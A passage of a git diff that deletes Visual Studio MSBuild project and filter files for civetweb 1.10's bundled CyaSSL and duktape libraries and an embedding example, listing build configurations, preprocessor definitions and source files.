-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>OPENSSL_EXTRA;HAVE_ERRNO_H;HAVE_GETHOSTBYNAME;HAVE_INET_NTOA;HAVE_LIMITS_H;HAVE_MEMSET;HAVE_SOCKET;HAVE_STDDEF_H;HAVE_STDLIB_H;HAVE_STRING_H;HAVE_SYS_STAT_H;HAVE_SYS_TYPES_H;WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>OPENSSL_EXTRA;HAVE_ERRNO_H;HAVE_GETHOSTBYNAME;HAVE_INET_NTOA;HAVE_LIMITS_H;HAVE_MEMSET;HAVE_SOCKET;HAVE_STDDEF_H;HAVE_STDLIB_H;HAVE_STRING_H;HAVE_SYS_STAT_H;HAVE_SYS_TYPES_H;WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>OPENSSL_EXTRA;HAVE_ERRNO_H;HAVE_GETHOSTBYNAME;HAVE_INET_NTOA;HAVE_LIMITS_H;HAVE_MEMSET;HAVE_SOCKET;HAVE_STDDEF_H;HAVE_STDLIB_H;HAVE_STRING_H;HAVE_SYS_STAT_H;HAVE_SYS_TYPES_H;WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>OPENSSL_EXTRA;HAVE_ERRNO_H;HAVE_GETHOSTBYNAME;HAVE_INET_NTOA;HAVE_LIMITS_H;HAVE_MEMSET;HAVE_SOCKET;HAVE_STDDEF_H;HAVE_STDLIB_H;HAVE_STRING_H;HAVE_SYS_STAT_H;HAVE_SYS_TYPES_H;WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\..\..\cyassl-2.7.0\;$(ProjectDir)..\..\..\..\cyassl-2.7.0\cyassl\</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\aes.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\arc4.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\asn.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\coding.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\des3.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\dh.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\dsa.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\ecc.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\error.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\hc128.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\hmac.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\integer.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\logging.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md2.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md4.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md5.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\memory.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\misc.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\pwdbased.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\rabbit.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\random.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\ripemd.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\rsa.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha256.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha512.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\tfm.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\crl.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\internal.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\io.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\keys.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\ocsp.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\sniffer.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\ssl.c" />

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\tls.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj.filters
deleted file mode 100644
index 566b892..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/civetweb_yassl/yassl_lib/yassl_lib.vcxproj.filters
+++ /dev/null
@@ -1,124 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\aes.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\arc4.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\asn.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\coding.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\des3.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\dh.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\dsa.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\ecc.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\error.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\hc128.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\hmac.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\integer.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\logging.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md2.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md4.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\md5.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\memory.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\misc.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\pwdbased.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\rabbit.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\random.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\ripemd.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\rsa.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha256.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\sha512.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\ctaocrypt\src\tfm.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\crl.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\internal.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\io.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\keys.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\ocsp.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\sniffer.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\ssl.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\..\..\cyassl-2.7.0\src\tls.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj
deleted file mode 100644
index 12fa214..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj
+++ /dev/null
@@ -1,156 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{0A11689C-DB6A-4BF6-97B2-AD32DB863FBD}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>duktape_lib</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>TurnOffAllWarnings</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>duktape_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;_DEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>duktape_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>duktape_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>duktape_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\third_party\duktape-1.5.2\src\duktape.h" />

-    <ClInclude Include="..\..\src\third_party\duktape-1.5.2\src\duk_config.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\third_party\duktape-1.5.2\src\duktape.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj.filters
deleted file mode 100644
index 1aab8c8..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/duktape_lib/duktape_lib.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\third_party\duktape-1.5.2\src\duk_config.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\src\third_party\duktape-1.5.2\src\duktape.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\third_party\duktape-1.5.2\src\duktape.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj
deleted file mode 100644
index a195fb6..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj
+++ /dev/null
@@ -1,162 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{4308C5EE-45E4-45D8-9D73-6C4E2587AD78}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>ex_embed_cpp</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140_xp</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

